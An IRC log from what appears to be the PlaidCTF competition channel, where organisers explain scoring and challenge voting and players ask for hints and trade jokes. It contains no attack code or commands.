(13:12:18) (fuzyll) tylerni7: mserrano: you guys suck...i can't tell the difference between what we've solved and what no one has solved
(13:12:23) (fuzyll) pick better colors
(13:12:24) (+mserrano) fuzyll: =\
(13:12:30) (+mserrano) blame cai_
(13:12:35) jOin: (cybertech) (4432fdee@gateway/web/freenode/ip.68.50.253.238)
(13:12:46) (+mserrano) fuzyll: well, if you look at the number in the bottom rightof the thing
(13:12:46) (fuzyll) cai_: be nicer to your colorblind players :P
(13:12:50) (+mserrano) the like x/y number
(13:12:59) (+mserrano) the y is the total number of problem parts; the x is the number that you have solved
(13:13:45) (fuzyll) mmm...alright....i /guess/ there's some redundancy :P
(13:13:57) (+mserrano) yeah
(13:14:03) (+mserrano) not ideal, but hopefully that's at least something
(13:14:13) (evertokki) lol
(13:14:31) (fuzyll) i'll manage lol
(13:14:51) (fuzyll) was just really confused when i thought we'd somehow solved wheeee
(13:14:58) (+mserrano) ah yeah
(13:15:00) (fuzyll) 'cause it's just a huge line of yellow
(13:15:03) (+mserrano) whee is a good problem :D
(13:15:06) (+mserrano) I'm totally not biased
(13:15:17) (fuzyll) then had people tell me that the solved problems are not, in fact, yellow :(
(13:15:18) (tarkiz) :-B
(13:15:32) (+mserrano) are they green or something?
(13:15:39) +mserrano hasn't actually ever seen a solved problem on this board
(13:15:42) (tarkiz) wow on mine that was a mustached smiley
(13:15:43) (fuzyll) that's what people keep telling me, but they're _wrong_ :P
(13:16:11) qUit: (gut) (
[email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
(13:16:33) (evertokki) lol
(13:17:16) (Redford) guys, how it was possible to jump to "doge_stage"?
(13:17:50) (+mserrano) because it skips solved problems
(13:17:55) (+mserrano) and chances if you're currently on a chance
(13:18:07) (pctf_scoreboard) ^^
(13:18:09) (pctf_scoreboard) ^^
(13:18:10) (Redford) oh, ok
(13:18:21) mOde: (ChanServ) sets (+o mserrano)
(13:18:26) (tomcr00se) yay qualed for codejam
(13:18:28) mOde: (mserrano) sets (+v pctf_scoreboard)
(13:18:31) mOde: (mserrano) sets (-o mserrano)
(13:18:32) (+mserrano) tomcr00se: lol
(13:18:44) (sorin) gj for codejam ;)
(13:19:05) (sorin) i had an issue at B for even the first dataset
(13:19:15) (sorin) the example worked fine but not their dataset
(13:19:22) (tomcr00se) now time to play more pctf
(13:19:32) (tomcr00se) i didn't miss on B
(13:19:45) (tomcr00se) i missed the first time on D because i didn't think
(13:19:53) (+ricky) tomcr00se: You didn't miss my awesome problem :-P
(13:20:12) (tomcr00se) ricky: yay
(13:20:35) qUit: ([gon]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156) Ping timeout: 240 seconds
(13:20:59) (+mserrano) tomcr00se: solve rsa
(13:21:05) (qll) stego :'(
(13:21:12) (+mserrano) lol, you guys chose it!
(13:24:09) (+pctf_scoreboard) 1=chance, 2=forensics250, 3=chance, 4=web200, 5=chance, 6=pwnable200
(13:24:37) (sven) 2 \o/
(13:24:56) (tomcr00se) omg 6
(13:25:13) (HotShot) fuzzyl
(13:25:32) (HotShot) are you from New Mexico Tech Fuzyll?
(13:25:41) (tomcr00se) doge_steg is hard
(13:26:04) (fuzyll) HotShot: ...what would i get if i said yes?
(13:26:12) (shadghost) wait... did it jump from 30 min to discharge to 5 min.
(13:26:30) (evertokki) lol
(13:26:37) (+mserrano) shadghost: time decreases as more people solve the problem
(13:26:52) (evertokki) oh that makes sense!
(13:26:52) (shadghost) melanie: only the current problem?
(13:27:05) (+mserrano) only the current problem
(13:27:11) (shadghost) got it
(13:27:17) (+mserrano) if you solve the other unsolved problem it immediately ends voting and starts another voting period
(13:27:39) (shadghost) by ends you mean it actavates?
(13:27:47) (+awreece) see also
(13:27:48) (+awreece) http://play.plaidctf.com/rules
(13:27:53) (+mserrano) it unlocks the current-in-the-lead problem yes
(13:27:54) nIck: (x56) is now known as (_NSA_)
(13:27:58) nIck: (_NSA_) is now known as (x56)
(13:29:26) (factoreal) hi all
(13:29:42) (factoreal) who solve web_150? i have question about that
(13:29:53) (+mserrano) factoreal: you can pm me
(13:31:05) qUit: (evertokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158) Ping timeout: 240 seconds
(13:31:38) (jarCrack) is there a server version of ezhp?
(13:31:46) (fal7Q) hi people
(13:31:47) (HotShot) you would get a thumbs down fuzyll, a big fat thumbs down
(13:32:01) (fal7Q) got some questions
(13:32:10) (fal7Q) im new in this ctf
(13:32:19) (HotShot) jk fuzyll i know you're from NYIT
(13:32:23) (fal7Q) are we allowed to use scanning tools?
(13:32:30) (HotShot) i remember you from CSAW :D
(13:32:57) (fuzyll) i'm not from there at all, though i /was/ a CSAW judge
(13:33:19) (n00bz) who done g++
(13:33:19) (n00bz) ?
(13:33:25) (fal7Q) to solve the challanges
(13:33:28) (fal7Q) ?
(13:33:58) (+mserrano) fal7Q: what do you mean by scanning tools?
(13:34:02) (+mserrano) if you mean dirbuster, pls no
(13:34:07) (+mserrano) nmap also won't help you
(13:34:07) (+mserrano) etc
(13:34:10) (sorin) ahh .. anyone from here solved whatscats?
(13:34:15) (fal7Q) yeah?
(13:34:23) (fal7Q) i.e they r prohibited
(13:34:26) (fuzyll) mserrano: but how do i hack web shit if i can't run nikto on everything?
(13:34:26) (fal7Q) ?
(13:34:26) (+mserrano) dirbuster will not solve the problem
(13:34:29) (HotShot) Elexander Taylor
(13:34:31) (+mserrano) and it will only piss us off
(13:34:31) (HotShot) Alexander
(13:34:35) (HotShot) we will buy you tons of pizza
(13:34:36) (HotShot) k?
(13:34:37) (+mserrano) and we will ban your ip from the problem
(13:34:53) (fuzyll) mserrano: i can only use kali linux plz make challs easier in future kthx
(13:34:58) (+pctf_scoreboard) 1=forensics250, 2=web200, 3=pwnable200, 4=crypto200, 5=reversing300, 6=misc350
(13:35:00) (+mserrano) lol
(13:35:37) (HotShot) fuck i dried a hexdump on doge_stego and kali crashed
(13:35:45) (HotShot) is that supposed to happen -.-
(13:35:57) (sorin) anyone can help me with a hint on whatscats? i don't understand something
(13:36:05) (fuzyll) HotShot: that's just the implant crashing - try it again, but this time on your host box
(13:36:15) (HotShot) fosho
(13:36:25) (HotShot) but i need to email it from vmwareplayer though
(13:36:38) (HotShot) i cant figure out where the files go when i unpack tarballs in cygwin
(13:36:51) (HotShot) and vi doesnt help a whole lot in that terminal
(13:37:16) (+mserrano) gcc (reversing 300) opened
(13:38:09) (lassimus) mserrano: did you write another challenge based off your compiler's class again?
(13:38:13) (+mserrano) no
(13:38:22) (+mserrano) there will be another one day, but not this year
(13:38:22) (fuzyll) plz no cnot v2
(13:38:28) (lassimus) lol
(13:38:43) (+mserrano) fuzyll: you're not excited for cninetynine?
(13:38:48) (fuzyll) D:
(13:38:50) (lassimus) I haven't looked at gcc, that was just a bad guess
(13:39:22) (n00bz) anyone has done g++ or ezhp?
(13:39:27) (Valodim) can I ask someone about whatscat?
(13:39:50) (+pctf_scoreboard) btw, gcc is down for a few minutes
(13:39:59) (fal7Q) guys, i had no experience in it security issues like in pctf, do u recommend to me to keep to play or to skip
(13:40:05) qUit: (pctf527) (46b9d762@gateway/web/freenode/ip.70.185.215.98) Ping timeout: 240 seconds
(13:40:16) (+mserrano) whatscat: ping me
(13:40:18) (+mserrano) g++/ezhp: ping me
(13:40:20) (fuzyll) fal7Q: how are you supposed to learn if you don't play?
(13:40:56) (s3Rious) can anyone give a hint for paris (RE 300) ? :)
(13:41:15) (sven) jeeez. what's the point of hints?
(13:41:18) (Ymgve) s3Ri0us: bang your head agaist your desk till everything becomes clear
(13:41:19) (sven) how are you going to learn anything?
(13:42:10) (mak`) quick question about zfs?
(13:42:18) (+mserrano) mak`: what's up
(13:42:26) jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
(13:42:54) jOin: (sorin_) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169)
(13:43:35) qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
(13:44:03) (s3Rious) Ymgve: I've done it. Now I have a headache....
(13:44:04) (tokki) hudak is giving me cancer
(13:44:05) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
(13:44:38) qUit: (sorin) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169) Ping timeout: 240 seconds
(13:44:38) (kanghee) I'm starting to hate white cats
(13:45:12) (sorin_) i also have issues there kanghee
(13:46:21) (tokki) lol
(13:47:01) qUit: (DaramG) (8ff8eb18@gateway/web/cgi-irc/kiwiirc.com/ip.143.248.235.24) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(13:47:11) (fal7Q) what kind of file is this ezhp?
(13:47:17) (fal7Q) :)
(13:47:29) (player10) executable
(13:50:40) qUit: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-qbloircajjrvxuam) Quit: Connection closed for inactivity
(13:51:25) (x7r0n) any ops for for100 ? or what is the pattern for it ?
(13:53:35) (corpille) so stega much cool
(13:53:52) jOin: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60)
(13:54:20) (+tylerni7) x7r0n: I mean
(13:54:21) (+tylerni7) it's stego
(13:54:24) (+tylerni7) find hidden flage
(13:54:28) (+tylerni7) very hidden
(13:54:31) (x7r0n) i got it
(13:54:32) (+tylerni7) much flage
(13:54:33) (player10) much secret?
(13:54:34) (+tylerni7) so stego
(13:54:35) (x7r0n) can i pm u
(13:54:40) (+tylerni7) x7r0n: sue
(13:54:46) (x7r0n) i mean i feel its the correct..can i ?
(13:54:49) (x7r0n) ok :-)
(13:55:33) qUit: (HotShot) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(13:56:28) (eZpl0it) :>
(13:57:05) (Gynvael) tylerni7: https://107.21.133.9/ from re300 is up?
(13:57:57) (+tylerni7) Gynvael: it's getting fixed..
(13:58:02) (Gynvael) ack
(13:58:11) (+tylerni7) sorry
(13:58:14) jOin: (nvs) (6adc406e@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.64.110)
(13:58:28) (Gynvael) no worries, just making sure it's not an IP backdoor, but a TCP one
(13:58:33) (Gynvael) ;D
(13:58:36) (Guest76035) So for tiffany, if I am running outside a debugger, should I be seeing ptrace errors?
(13:58:45) (+tylerni7) Gynvael: xP
(13:58:52) (+tylerni7) backdoor? whatever could you mean :O
(13:59:29) (jduck) Gynvael: did you try dirbuster?
(13:59:30) (Gynvael) tylerni7: nevermind, I mixed up the tasks
(13:59:31) nIck: (gameredan) is now known as (Guest24706)
(13:59:34) (Gynvael) jduck: hey man
(13:59:43) (jduck) ;D
(13:59:48) (+tylerni7) ;)
(13:59:51) (+tylerni7) hey jduck
(13:59:59) (Gynvael) jduck: yeah! it couldn't connect on 1 server, to I started it on amazon 100 machines
(14:00:04) (+tylerni7) lol
(14:00:07) (Gynvael) jduck: just to be sure I get my fair share of cpu
(14:00:17) (+tylerni7) when we give source, it really makes me sad when people use dirbuster
(14:00:25) (jduck) LOL
(14:00:27) jOin: (olkis) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(14:00:28) (Gynvael) hahahaha
(14:00:29) (Gynvael) lolz
(14:00:38) (robbje) people will always use dirbuster :>
(14:00:47) (+tylerni7) we should really set up some IDS or something that auto detects dirbuster
(14:00:48) (robbje) dirbusters gonna dirbust!
(14:00:51) (jduck) they were hoping for http://challenge.server/key.txt
(14:01:06) (mongo12) ban all dirbusters!
(14:01:17) (mongo12) and then hang them
(14:01:19) (mongo12) \o/
(14:01:34) (+tylerni7) yeah, we block IPs when stuff DoS's
(14:01:45) (foundation) tylerni7: it could be a research paper, IDS that detect only lame attacks and lets in sophisticated ones!
(14:01:47) (Gynvael) tylerni7: reply with fake flags on common dirbuster queries
(14:01:53) (Gynvael) haha
(14:02:14) (+tylerni7) foundation: haha
(14:03:16) (mongo12) haha
(14:03:19) jOin: (InternalCumBustI) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
(14:03:33) (jduck) Gynvael: nooooo, they they will try to submit them all!
(14:03:38) (mongo12) in most cases, you could probably do, more than X reqs in Y secs, iptables drop for 5min
(14:03:52) (mongo12) should stop it pretty fast
(14:04:02) (Pitr_) Time to introduce fake flags with penalty-points
(14:04:12) (jduck) :)
(14:04:30) jOin: (wa1ker) (6adc5e91@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.94.145)
(14:04:50) (foundation) you know what i'm gonna do for the next time, i'll make a fake stegano tool and put it on SF and github , and pwn people that use random tools to try to solve stupid stegano challenges
(14:04:54) (wa1ker) !misc
(14:05:03) jOin: (Adran) (adran@botters/staff/adran)
(14:05:04) (foundation) who opens a stegano challenge , anyway?
(14:05:27) jOin: (knc) (310f825d@gateway/web/freenode/ip.49.15.130.93)
(14:05:38) (Gynvael) jduck: that's the idea!
(14:05:43) (Gynvael) jduck: and each flag, -10 points!
(14:05:44) (Gynvael) ;D
(14:05:57) (Gynvael) flags of shame or sth
(14:05:58) (+tylerni7) Gynvael: xD
(14:06:07) (+tylerni7) we've discussed things like this >.<
(14:06:14) (Gynvael) hah ;)
(14:06:16) (Gynvael) awesome
(14:06:45) (InternalCumBustI) im so confused on doge_stego I know where the message is but i have no clue how to get it
(14:07:14) qUit: (nvs) (6adc406e@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.64.110) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(14:07:26) (player10) copy paste
(14:08:25) (InternalCumBustI) copy paste what?
(14:08:40) (ShortKidd) ohhey heartbleed worked the first time.
(14:09:34) (player10) copy paste the flag
(14:09:36) (+pctf_scoreboard) gcc server is up. thank you for you patience and flying PPPair.
(14:09:52) (+tylerni7) heh
(14:10:13) (Gynvael) thanks
(14:10:32) (mouth`) argh whatscat! we've exploited you why you no give flag??
(14:11:10) (ShortKidd) HAve you asked nicely?
(14:11:34) (+tylerni7) mouth`: you can pm me perhaps
(14:11:40) (+tylerni7) you probably didn't exploit it hard enough
(14:11:58) (+tylerni7) :)
(14:12:03) (player10) did you try turning your exploit off and on again?
(14:12:17) (ShortKidd) Try asking nicely. I know I wouldn't do something for you if you exploited me.
(14:12:22) (halfvollemelk) any tips for rendezvous challenge?
(14:12:24) (halfvollemelk) i'm stuck
(14:13:06) jOin: (awesie) (~awesie@freenode/sponsor/awesie)
(14:13:13) (n00bz) who i can pm about web300?
(14:13:17) mOde: (ChanServ) sets (+v awesie)
(14:13:22) (mouth`) tried asking the t-rex nicely yeah
(14:13:23) (Adran) trex cat must be repaired :>
(14:13:40) qUit: (trelgak) (
[email protected]) Read error: Connection reset by peer
(14:14:18) qUit: (olkis) (4e087709@gateway/web/freenode/ip.78.8.119.9) Quit: Page closed
(14:15:33) (iZsh) the number of PM is increasing it seems
(14:15:51) (+tylerni7) ?
(14:16:09) (Mawat) The Chandler relay servers, is there just 1?
(14:16:21) (+tylerni7) Mawat: there are multiple
(14:16:29) (Mawat) So I can use any?
(14:16:29) (+tylerni7) houqp: is the authority though (it's his problem)
(14:16:34) (+houqp) yes
(14:16:42) (+houqp) any of them will work
(14:19:05) qUit: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182) Ping timeout: 240 seconds
(14:20:29) jOin: (pctf533) (46b9d762@gateway/web/freenode/ip.70.185.215.98)
(14:20:57) (asmoday) I cannot get shit on this
(14:21:25) (+houqp) have you tried poop?
(14:21:44) (Anyny0) x)
(14:21:52) (tokki) lol
(14:22:02) jOin: (DKay) (uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc)
(14:22:03) (asmoday) whatacat failed to email, mtpox got admin.php failed, heartbleed none of my scripts dump anything, paris ollydbg just execptions, pyjail just get registers no flags
(14:22:36) (asmoday) time to apply at mcdonalds or walmart
(14:23:29) (pctf533) lol
(14:24:07) qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(14:24:16) (Brooklynt_Overfl) Everyone needs a plan B. There is always stripping.
(14:24:29) (nullProtectorate) lol
(14:24:50) (x_x) Just solved my first stego challenge. Walmart avoided. Faith in self, restored.
(14:24:51) (x_x) >_>
(14:24:52) (x_x) <_<
(14:24:55) (asmoday) I have a not so large member, so perhaps nursing home stripping
(14:25:09) (+tylerni7) lol
(14:25:10) (+gbarboza) Awk
(14:25:26) +tylerni7 almost spat water on his screen
(14:25:40) (asmoday) like bad grandpa deal
(14:27:14) (asmoday) anybody want to get addicted to drugs instead of these crazy challenges
(14:28:01) jOin: (kurtisebear) (sid28273@gateway/web/irccloud.com/x-ettntmmjyjvsqznk)
(14:28:48) jOin: (n00b13) (~n00b13@unaffiliated/nitsua)
(14:29:38) (+gbarboza) asmoday: Why not both?
(14:30:20) jOin: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
(14:30:40) (asmoday) this is too stressful for multitasking
(14:31:45) jOin: (xhs) (5e88c674@gateway/web/freenode/ip.94.136.198.116)
(14:34:11) qUit: (j0f) (~j0f@unaffiliated/j0f) Ping timeout: 240 seconds
(14:35:52) qUit: (wa1ker) (6adc5e91@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.94.145) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(14:35:56) (x7r0n) 2012 pwnies
(14:36:03) (x7r0n) guess u shld have made 2014
(14:36:06) (x7r0n) :-p
(14:37:12) jOin: (anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
(14:42:16) qUit: (Tapyroe__) (
[email protected]) Read error: Connection reset by peer
(14:42:19) (a13k) is rendezvous working as expected?
(14:42:29) (anyny0) Probably
(14:42:36) (+tylerni7) a13k: almost certainly
(14:42:38) (+houqp) a13k: you know the solution?
(14:42:42) (anyny0) Not being able to connect is part of it
(14:42:46) (a13k) tylerni7: thanks.
(14:42:52) (a13k) houqp: maybe
(14:43:00) (a13k) still some things to try
(14:43:00) (+houqp) ok pm me please :)
(14:43:06) (a13k) will pm if they don't work
(14:43:10) (anyny0) Any hints for WhatsCat? I really have no clue on where might the exploit be
(14:43:36) (cybertech) so i am trying to find out the twenty cypto
(14:43:40) (cybertech) i found the key
(14:43:47) (cybertech) but its not the flag
(14:43:55) (cybertech) but than i found a poem
(14:44:16) (anyny0) The flag might be in the poem
(14:44:26) (+tylerni7) maybe specifically towards the end
(14:44:48) (a13k) houqp: issue is on my end
(14:44:51) (+mserrano) lol
(14:45:05) (halfvollemelk) tips for rendezvous? i could rly use one
(14:45:09) (+houqp) nice :)
(14:45:41) (a13k) houqp: never hurts to ask though :-p I've ran/cometed in enough ctf's to know to ask if things are working as expected before beating my head against the desk
(14:45:47) (+mserrano) Good job hellman! there goes wheee
(14:46:53) (+houqp) a13k: yeah, rendezvous behaviours like it's down most of the time, which is sad :(
(14:47:05) (+tylerni7) nice mslc :)
(14:47:06) (+houqp) halfvollemelk: scroll back
(14:47:16) (Cimmi) cybertech: look at the end
(14:47:24) (hellman) open more crypto, i can't look at rsa :/
(14:47:29) (+tylerni7) hahah
(14:47:30) (+mserrano) hellman: lol why not
(14:47:33) (+tylerni7) why not xD
(14:48:24) (a13k) houqp: I kinda figured that. seemed obvious from the initial text from the challange. the issue I had was some configs
(14:48:26) (anyny0) Could someone give me a tiny lead on whatsCat?
(14:48:36) (cybertech) cimmi i am
(14:48:40) (cybertech) i dont get it
(14:48:43) (cybertech) hmm
(14:49:28) (+mserrano) voting is open
(14:49:32) (+mserrano) I would recommend voting for chance
(14:49:38) (+mserrano) you've gotta get something this time :P
(14:49:48) (+tylerni7) that's how randomness works, sure
(14:49:51) (+tylerni7) -_-
(14:50:06) (+mserrano) yup
(14:50:08) (+mserrano) it is
(14:50:12) (x_x) Yeah, twenty is giving me a headache, too. Found the flag, but it doesn't accept.
(14:50:20) (+tylerni7) x_x: pm me/
(14:50:23) (+mserrano) x_x: pm me what you think the flag is
(14:50:24) (+mserrano) or tylerni7
(14:51:12) (asmoday) all in all am learning a bit, I really hate the plague though, now that move is ruined
(14:51:20) (+tylerni7) heh
(14:51:45) (Cimmi) The flag should be readable as a sentence
(14:51:50) (arthurdent) asmoday: hold your tongue sir
(14:52:09) (arthurdent) that movie is a classic
(14:52:21) (corewar) it can never be ruined
(14:52:21) (asmoday) classic pain the arse
(14:52:33) (asmoday) that gcc though
(14:53:16) (+pctf_scoreboard) that movie is the best
(14:53:18) (asmoday) plague could go back and become Dades dad
(14:53:31) qUit: (virodoran) (uid2011@gateway/web/irccloud.com/x-nkhkmgpqfkcsbbie) Quit: Connection closed for inactivity
(14:53:35) qUit: (xhs) (5e88c674@gateway/web/freenode/ip.94.136.198.116) Ping timeout: 240 seconds
(14:53:45) (arthurdent) wat
(14:54:16) (asmoday) then move through time and impregnate kate then really screw things up for Zero Cool
(14:54:24) (+tylerni7) lol
(14:55:34) (asmoday) after that Penn aka Hal can do some magic with Teller who was in the movie as Gibson Mainframe
(14:56:30) (asmoday) oh Phiber if you only knew
(14:56:40) qUit: (badeec) (~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a) Quit: Leaving
(14:58:25) jOin: (paraxor) (~aoepxnpe@unaffiliated/prazial)
(15:00:12) (arthurdent) now that you mention it, gibson mainframe never spoke
(15:00:21) (asmoday) right haha
(15:00:29) (asmoday) and Penn is never far from Teller
(15:00:44) (asmoday) its like his liver, little and full of stress
(15:01:03) qUit: (Bijan-E) (~bijan-e@unaffiliated/bijan-e) Ping timeout: 245 seconds
(15:01:10) (ghostpixel) i'm working on reekee, but i can't seem to find the file location where the site is being hosted from...
(15:02:37) (asmoday) I am surprised finding flight 370 wasnt a flag on this....
(15:02:45) (asmoday) too soon, too soon....
(15:03:35) qUit: (knc) (310f825d@gateway/web/freenode/ip.49.15.130.93) Ping timeout: 240 seconds
(15:05:15) (n00b13) what is the input key length for web 150
(15:05:23) (+cai_) heh we have over 1000 registered teams now :p (780 of them have at least 1 point)
(15:06:22) jOin: (knc) (6a4cc70d@gateway/web/freenode/ip.106.76.199.13)
(15:09:16) (+tylerni7) ooo dragon sector close to 2nd place
(15:09:18) (+cai_) voting ends in 5 minutes
(15:10:04) (+mserrano) oh man DS
(15:10:06) (+mserrano) goin' hard
(15:10:08) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(15:10:19) qUit: (nullProtectorate) (
[email protected]) Remote host closed the connection
(15:10:48) (+cai_) 1 point difference :p
(15:10:48) (+cai_) now in 2nd
(15:10:48) (+cai_) nice
(15:11:22) (+mserrano) now you just have to catch 0xffa ;)
(15:12:05) qUit: (dedet) (d42931c1@gateway/web/freenode/ip.212.41.49.193) Ping timeout: 240 seconds
(15:12:31) (tokki) OH SHIT
(15:12:39) (tokki) I GO IN AND THE CHRONOSPHERE IS ON
(15:12:43) (tokki) DANGGGGGG
(15:12:50) (+tylerni7) zomg, teh chronospherez
(15:13:00) (+tylerni7) but yeah voting time :)
(15:13:19) (tokki) wait im still confused tho, if you vote 1, does it skip the opened challs?
(15:13:37) (+tylerni7) yes
(15:13:42) (n00b13) any hints for web150?
(15:14:06) (tokki) WE NEED ANOTHER CHANCE VOTEZ 1
(15:14:16) (+mserrano) uh
(15:14:21) (+cai_) you mean 3
(15:14:21) (+mserrano) you mean vote 3
(15:14:23) (tokki) k
(15:14:24) (tokki) 3
(15:14:32) jOin: (Bijan-E) (~bijan-e@unaffiliated/bijan-e)
(15:14:40) (tokki) i thought skipping as like skipping the tiles for opened challs
(15:14:48) (+mserrano) you are currently at gcc
(15:14:49) (tokki) nvm
(15:14:52) (+mserrano) lol
(15:14:55) (tokki) lol
(15:15:25) (+cai_) voting ends soon
(15:15:32) (tokki) *gasp* *gaspgasp*
(15:15:36) (n00b13) is it just me or should web150 be worth more
(15:15:38) (+cai_) damn
(15:15:41) (+cai_) no luck on chance card
(15:15:45) (+cai_) new voting starts
(15:15:51) (+cai_) you have 5 mins :)
(15:15:54) (tokki) DANGGGGGG
(15:16:34) (tokki) wait no i dont think i get the chronosphere thing but i guess its okay
(15:16:36) (corpille) crap no luck for today
(15:16:41) (tokki) ikr
(15:16:43) (+houqp) 15:50:31 +tylerni7 | that's how randomness works, sure
(15:16:44) (asmoday) I am playing pokemon
(15:16:45) (rev1550) is anyone else having problems download doge_stege
(15:17:05) (tokki) go pikachu!!!!!!!!!
(15:17:12) tokki throws hamster
(15:17:21) (+cai_) tokki: what don't you get it?
(15:17:45) (tokki) k so you guys said that the voting skips opened challs
(15:17:47) (+cai_) the hatched tile is where the current position is
(15:17:52) (+cai_) yes it does
(15:17:57) (tokki) so if you vote like 1 right now,
(15:18:07) (+cai_) it will open pwnables 150
(15:18:08) (tokki) where do you go
(15:18:14) (+cai_) at the end of the present board
(15:18:29) (tokki) OH I GET IT
(15:18:32) (+cai_) :)
(15:18:35) (tokki) OH
(15:18:40) (+mserrano) 1 -> pwnable 150; 2 -> reversing 250; 3 -> pwnable 200; 4 -> forensics 350; 5 -> crypto 250; 6 -> misc 10
(15:18:42) (tokki) sry for my idioticness
(15:18:45) (+mserrano) pls misc 10
(15:18:46) (+mserrano) or
(15:18:48) (+mserrano) forensics 350
(15:18:52) (+mserrano) or
(15:18:53) (tokki) pls misc 10
(15:18:54) (corpille) misc 10
(15:18:54) (tokki) pls
(15:18:55) (+mserrano) pwnable 150
(15:18:56) (tokki) pls
(15:18:58) (+cai_) lol
(15:19:16) (anyny0) Mis 10 :D
(15:19:31) (tokki) pls misc
(15:19:33) (tokki) ily guys
(15:19:35) (+mserrano) no
(15:19:37) (+cai_) what about 2-part forensics 350?
(15:19:37) (tokki) pls
(15:19:40) (+mserrano) pls pwnable 150
(15:19:43) (+mserrano) or 2-part forensics
(15:19:44) (tokki) pls misc 10
(15:19:44) (Hertz_) pls nothing
(15:19:46) (tokki) pls
(15:19:47) (tokki) lol
(15:19:48) (+mserrano) Hertz_: lo
(15:19:48) (+mserrano) l
(15:20:03) (tokki) i aint got time fo dat
(15:20:09) (asmoday) is the point to just do pokemon forever
(15:20:19) (tokki) pokemon!
(15:20:20) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(15:20:21) (asmoday) its stuck on chaning art i think
(15:20:24) (asmoday) changing
(15:20:35) (asmoday) ha i think i broke it
(15:20:43) (+cai_) misc10 is opened
(15:20:44) (+cai_) lol
(15:20:46) (+cai_) you guys win
(15:20:59) (+mserrano) lol
(15:21:05) (tokki) ILYyYYYYY
(15:21:32) (tokki) ♥︎
(15:21:36) (+mserrano) lol
(15:21:38) (+cai_) time to watch people submitting wrong number
(15:21:42) (+cai_) lol
(15:21:43) (+mserrano) everyone is guessing the wrong thing
(15:21:50) (tokki) lol
(15:21:51) (+mserrano) like literally everyone
(15:21:54) (tokki) lol
(15:21:57) (subsnake) will there be any hints soon?
(15:21:58) (tokki) lemme join ;)
(15:22:05) (+mserrano) YEAH BS LABS
(15:22:05) (tokki) NOT TILL THE CHANCE
(15:22:07) (+cai_) grats BS Labs
(15:22:09) (+mserrano) FIRST BLOOD
(15:22:10) (tokki) THE FREAKING CHANCE
(15:22:13) (tokki) 300G
(15:22:21) (+cai_) voting is up again lol
(15:22:26) (+mserrano) yay MSLC
(15:22:34) (+mserrano) and H4x0rPsch0rr
(15:22:38) (+mserrano) there goes the breakthrough
(15:22:39) (anyny0) Hmm
(15:22:47) (+cai_) except there is no bonus point
(15:22:49) (+cai_) lol
(15:23:28) (anyny0) x)
(15:23:47) (tokki) shet
(15:23:58) (+mserrano) yay dcua
(15:23:59) (+mserrano) 4 solves
(15:24:01) (tokki) i cant believe im stuck in misc 10
(15:24:14) (+mserrano) misc 10 is a quality problem
(15:24:14) jOin: (vooX) (4e81ae54@gateway/web/freenode/ip.78.129.174.84)
(15:24:22) (tokki) hmm..
(15:24:38) (corpille) 38.55 * 1700 mmhh ...
(15:24:46) (asmoday) yeah not what you think
(15:24:55) (+cai_) it's hard
(15:25:01) (+tylerni7) yeah man
(15:25:02) (+cai_) not everyone can do that correctly
(15:25:04) (+tylerni7) multiplication is hard
(15:25:12) (tokki) D:
(15:25:15) (tokki) D::
(15:25:17) pArt: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd)
(15:25:29) (asmoday) google is not your fiend
(15:25:29) jOin: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd)
(15:25:32) (asmoday) friend
(15:25:32) (tokki) D:::::
(15:25:48) (tokki) how did people solve dis
(15:25:56) (vooX) damn, web300 is more easier than web200..
(15:26:48) subsnake pings tylerni7 pm
(15:27:09) tokki hurls trout
(15:27:22) (bobsteam) is it vooX ?
(15:27:54) (vooX) yup, at least the kpop one
(15:27:57) (vooX) which i'm still fighting with
(15:28:04) (+mserrano) bubble bubble pop pop
(15:28:09) (bobsteam) ah, I haven't started kpop yet
(15:28:23) (tokki) kpop is the best
(15:28:30) (bobsteam) I'm too busy hating memes and cats
(15:28:46) (+cai_) man we are gonna hit 10K submissions soon >:-)
(15:29:00) (+tylerni7) lol
(15:29:10) (rray) web300 is frustrating ;_;
(15:29:25) (tokki) lol
(15:29:36) (vooX) not as furstrating as songs-web
(15:30:07) (+tylerni7) forensics 250 is cool :)
(15:30:07) (+cai_) forensics opened
(15:30:11) qUit: (knc) (6a4cc70d@gateway/web/freenode/ip.106.76.199.13)
(15:30:15) (+tylerni7) good challenge to open up :)
(15:30:15) (+mserrano) CURLCORRRRRRRRRRRRRRRRRRE
(15:30:29) (tokki) CURLLLLLLL
(15:30:35) pArt: (paraxor) (~aoepxnpe@unaffiliated/prazial)
(15:34:34) (marcan) man, paris took way too long.
